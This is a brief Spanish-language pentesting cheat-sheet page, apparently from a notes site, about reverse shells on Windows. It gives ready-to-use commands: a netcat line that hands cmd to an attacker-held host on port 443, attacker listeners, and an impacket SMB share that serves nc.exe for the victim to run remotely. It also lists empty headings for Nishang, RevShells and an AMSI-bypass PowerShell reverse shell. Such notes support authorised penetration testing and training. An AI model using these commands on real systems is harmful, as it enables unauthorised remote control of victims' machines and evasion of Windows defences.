Reverse Shell
Nc.exe
# Víctima
.\nc.exe -e cmd <ATTACKER_IP> 443
# Atacante
nc -nlvp 443# Atacante (Kali)
rlwrap -cAr nc -nlvp 443
impacket-smbserver smbFolder $(pwd) -smb2support
# Vítima (Windows)
\\<ATTACKER_IP>\smbFolder\nc.exe -e cmd <ATTACKER_IP> 443Reverse Shell Nishang
RevShells

BypassAMSI_PSRevshell
"Revshell" command
Usage
"Server" command
Usage
Última actualización
¿Te fue útil?